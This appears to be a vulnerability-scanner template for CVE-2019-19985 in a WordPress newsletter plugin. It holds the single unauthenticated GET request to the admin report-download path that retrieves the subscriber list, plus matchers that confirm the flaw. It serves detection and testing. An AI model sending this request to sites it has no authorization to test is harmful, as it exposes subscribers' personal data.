id: CVE-2019-19985 info: name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download author: KBA@SOGETI_ESEC severity: medium # Source:- https://www.exploit-db.com/exploits/48698 requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all" matchers-condition: and matchers: - type: word words: - Subscribed - type: status status: - 200